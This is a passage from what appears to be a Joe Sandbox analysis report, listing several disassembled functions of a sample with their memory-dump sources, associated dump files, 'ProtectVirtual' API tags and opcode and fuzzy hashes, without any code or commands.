                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3a359ee2a3b03e90d081b30936bbb9807928d439a71d6ea281ba6fb85533bc12
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0F514AB2D045259BF7248A04CC85AEB7779EB94310F1451FBD84E52240D67C1FC78F56
                                                                                                                                                                                                                                                                                                Function 00439789 Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 802b0a211486bef0cc98051e0102cd016ceaa11f3b5be1bf398ba9f457cc0077
                                                                                                                                                                                                                                                                                                • Instruction ID: e888e7339d9df3a6bbadaed361dd43901289f0749b2527cda9d436d033705ab7
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 802b0a211486bef0cc98051e0102cd016ceaa11f3b5be1bf398ba9f457cc0077
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3A4147B2E056199FF7108A15CC95AEBB778EBC5300F1150FAD84E67281D67C1FC28E52
                                                                                                                                                                                                                                                                                                Function 004397D6 Relevance: 1.6, APIs: 1, Instructions: 139COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 4dfd546009c68192daa57f0101370b962118b4f4a7354da4f17bbd8a721f372b
                                                                                                                                                                                                                                                                                                • Instruction ID: aabc0c232bf1433f6aaec411c4e83b68c44377d7b4ea5ca0978e70ecec76a48d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4dfd546009c68192daa57f0101370b962118b4f4a7354da4f17bbd8a721f372b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B54125B2E056199FFB208A11DC95AEBB778EBC5310F1151FAD44E27281D67C1FC28E92
                                                                                                                                                                                                                                                                                                Function 004391DB Relevance: 1.6, APIs: 1, Instructions: 131COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: a79fdf18a5b6b7156cdcf8ac230ccb7ef05a696dbf99d12399f7b7309692736e
                                                                                                                                                                                                                                                                                                • Instruction ID: c7ac164e5441c9154275cdfc79dd59a2a418125cd8dd6e6e03baeee758ed4725
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a79fdf18a5b6b7156cdcf8ac230ccb7ef05a696dbf99d12399f7b7309692736e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 06417AB2D05515ABF7248A14CC45AEB7779EB94310F1450BFE84E52240D6BC1FC78FA6
                                                                                                                                                                                                                                                                                                Function 004391A9 Relevance: 1.6, APIs: 1, Instructions: 131COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 1d63f9853c601a332c09d70dadf74749b9190102c80af950c79679dccfbcee13
                                                                                                                                                                                                                                                                                                • Instruction ID: 1345a6211f0fe84e35c74fe35573f94a53755804c98c89c4ad291533f2b15653
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1d63f9853c601a332c09d70dadf74749b9190102c80af950c79679dccfbcee13
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BC415AB2D05515ABF7248A14CC45AEB7779EB94310F1450BFE84E52240D6BC1FC78FA6
                                                                                                                                                                                                                                                                                                Function 00439200 Relevance: 1.6, APIs: 1, Instructions: 131COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: d87d273e5deaa31aa89f561b0c773f875e572ef548cf36e417c327a24d17bb18
                                                                                                                                                                                                                                                                                                • Instruction ID: d5d9cf05a643e3b4489e46a6efab9cb9c8e8a93499dc35cf3c9c00847b662aa1
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d87d273e5deaa31aa89f561b0c773f875e572ef548cf36e417c327a24d17bb18
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C3417AB2D05515ABF7248A04CC45AEB7779EB94310F2450BFE84E52240D6BC1FC78FA6
                                                                                                                                                                                                                                                                                                Function 0043962D Relevance: 1.6, APIs: 1, Instructions: 131COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: fb05cb89a7dbef9a4c2ea1285af9003b43956c5b57a1429f14e938349e907f0d
                                                                                                                                                                                                                                                                                                • Instruction ID: 4e28582e9f37416d6620b13804a8a356790ebfb193c8f743acc56a859577dba6
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fb05cb89a7dbef9a4c2ea1285af9003b43956c5b57a1429f14e938349e907f0d
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 304145F2D056199FFB108A10CC85AEAB778EB84310F1451FAE88D56241D67D5FC28E92
                                                                                                                                                                                                                                                                                                Function 004395CD Relevance: 1.6, APIs: 1, Instructions: 129COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 9e5c761747b375fc94473b918c0e498071484eaf78b83f18d7d5563da748537a
                                                                                                                                                                                                                                                                                                • Instruction ID: a22c5855b130839aa5ea06fd94acba7f6c38059715d5cb9de43f847702a0b89a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e5c761747b375fc94473b918c0e498071484eaf78b83f18d7d5563da748537a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2D4115B2D056199FFB108A10DC916EAB774EF85311F1450FAD88E56281D67D1FC28F92
                                                                                                                                                                                                                                                                                                Function 00438E13 Relevance: 1.6, APIs: 1, Instructions: 124COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 0aaf206436fa3c15d218b4788ae1765f30cab5cbcdd0cb4d24f3e27ccfaa5e97
                                                                                                                                                                                                                                                                                                • Instruction ID: 7155ced1e007b9811f0e782bf11fc2934cb1b7a2a226f842295014da7c971605
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0aaf206436fa3c15d218b4788ae1765f30cab5cbcdd0cb4d24f3e27ccfaa5e97
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A3167F2E046059BF7104610DC85BFB7778EB94310F1551BBE84D66680D6BD1FC68AA3
                                                                                                                                                                                                                                                                                                Function 004394AF Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
